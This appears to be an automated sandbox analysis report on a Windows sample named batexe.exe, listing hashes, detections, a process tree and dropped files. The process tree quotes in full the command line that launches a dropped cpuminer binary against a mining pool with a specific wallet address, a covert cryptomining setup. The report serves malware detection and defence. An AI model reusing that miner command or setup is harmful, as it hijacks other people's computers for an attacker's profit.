73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
302s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 18:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4584	b2e.exe
3744	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1404-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4720 wrote to memory of 3744	4720	cmd.exe	78
PID 4720 wrote to memory of 3744	4720	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Local\Temp\17D8.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\17D8.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\17D8.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1E03.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\17D8.tmp\b2e.exe

Filesize
2.0MB

MD5
fdeff16ca964a2e9a2203979adac8aef

SHA1
63fd594b64440d14c8bbb531f900073ca93d6f24

SHA256
ec3b54b18cd56dc7a31df8ba96620e24f6ba98f305481e310b7f159ce544f7c7

SHA512
e892709e7c3ff823345cdbde2b4be9f51b3769456baed5ab824bda5ae849dbcff8c2a5750c7db79baa9636eda2542df5df5421b6e8629c827fa4db1abc188e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\17D8.tmp\b2e.exe

Filesize
1.7MB

MD5
7b9e19cbeef48d1436f80636d98f1e29

SHA1
211ab3ec2dbf56621bfa6e7b4af51f6d59ed7e22

SHA256
ab3065d4cd6d2916257227617fba70a92bdb7b65f474d9a3b5a7910c6791775d

SHA512
cd561dbc1747d3f5e1a799a1d6f13d71150e273835ecfd1f84b00e742b04a23b41daf83db404ef527c1531f665bd6e74a4fc62bc84759208b958a4803063bdae

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E03.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
520KB

MD5
2364616e922ca7ecf2d594e4ee4216da

SHA1
f683eadc7a00a6e401d63c55e39c3e2c82a717f5

SHA256
491d21175c4d6b45227a0e0d2090531ed2cae00c4b029cc37fa2e274d3b5e656

SHA512
bc93249d1097809e4a160a4c48701bf4039ef62659ca79a7bba78d649915e1c98202d36dea863a43084ca28c65faf4efcb442db2bdad78be18add1eeee1c5f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
567KB

MD5
e6566f2b91544457f31000f3eb2fafd0

SHA1
8306be26a2c699bed6e60de978f123f3372f56c1

SHA256
9e3e5e8e54402df7d705306ac23584f4762afae58f07677fb13750b7c745cb27

SHA512
089d6c0d9c1ddd96fe55766008c1a3313f24af9e5e96928017dc9436188f8a3a6605daa0ec89fa3486c7f7bbc621dc0c6c9de287e0d6f62079a9598983bac77a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
747KB

MD5
ab94ddb7eaf7125adc7c650187912b6d

SHA1
292af86906e6e522ddd2ff839b4d97ec77750af4

SHA256
1c03c30c0f5787bb9ba68d2fd83a38e89a75749133fe3db5eb7972de53415541

SHA512
49661dc89a761fef50f90cff382667b83ba1fb20ea62295f5cc174310ef4e0606c9c3f0739980ebdd61238be7e61f2e9b74c63f91e6ee42acbf2247ffcd3b5a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
632KB

MD5
0ecfaa4431a2dc1503f7d4b6b1edf045

SHA1
25d5d6de19f168cb4b7f6fdc9811f3959673d4a3

SHA256
31b3cb122a2388f3a19d4f33c61fa8a4b0455b206afa5711daa14aaa01b77b49

SHA512
7ffa1936738865521fa2f1788ec14d7d9b25704b9b8dd8c34a48bbb3670ebfbcc467c911475d747a6f5493d1f68079f993b9134746638667a5e102bab9b47d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
730KB

MD5
e30fc25a8467fffb05bf3404bc229b49

SHA1
d3d0c132fa4dd3ba5e7228db0fbb4a3b020bc39e

SHA256
4452e7976b0f4f6fb7de27818a3afdb8a2ac7864acb6710783fee54df080e47c

SHA512
7f7d16e48c967508528426688b0e88b0f8c564d0b0f1a5c43bcaaec1a594156044231c839c1946b069da36df1f737238d8a66f6435c092664db75a52953aa536

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
495KB

MD5
86d5ef708a06f8650fdb9c65e4faa42d

SHA1
9a7c67a399f20681003196f6c6cf843b5f9a1dc4

SHA256
91a946abd65ea9b3e63a6c909136f0de7fc29d0935be7d43d5ec072992cf24c4

SHA512
cd0a7c1de5e0b91970f4bd1520776476787f207a0b1a10eff886b2f46bb8cf348e409f4157141fdeefaf01ba3f7462e332754bb67c2b05ba7c898efae9f1286b

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
710KB

MD5
2c1a59c2b9a920e38f903f4db1139e4c

SHA1
1a6345a05fae425cbedd1f1af17647ae03711aa3

SHA256
dd4b2152fa244c26e5baa2ae13bcf726dadcdd34ab3277cd2edbbd0aed010f5f

SHA512
922e15f805b72ea5a9c6c6b10d1faf97e7310945decd96f29802e6d86d3132174a70339ece13894078cfcdabf9928f1d8b46d548fe822f022ca82e618fc03b37

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
602KB

MD5
30b0ea1c9502485fb454e4107f1f5699

SHA1
2ae3765d4e5127fbc08e377bccacfdc0ad539115

SHA256
4fdbc70f942396961b1fced7ef72f1932769724538bacd119fdf48feef991378

SHA512
ce2de2c4da9a00f83646f8b6e754dfdefdcc04858f1779d9a65baef6531ec6cd97d7d07b5002191afc88b4f829a868eb116cc1a7c8068e289fde6d33ff508c6c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
714KB

MD5
468596bcca68c46f1cb49e6971929f7d

SHA1
5a41538205ec52122d2d1ad1f96192f9f6cdfdc5

SHA256
f5a166cb1d1940a297f91978bb370ca4e4d056faafca22a0c1ee01674da17ad9

SHA512
61307d5058e461d5cd8baad6701400360f3689cbfb04e4a3e7810ea349895b5ea036918f19ea45c600447d744407fe1e4bcc1a074cdd8d0445cd8797f016a342

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1404-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3744-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3744-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3744-43-0x0000000061B90000-0x0000000061C28000-memory.dmp

Filesize
608KB

Download
memory/3744-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/3744-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4584-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download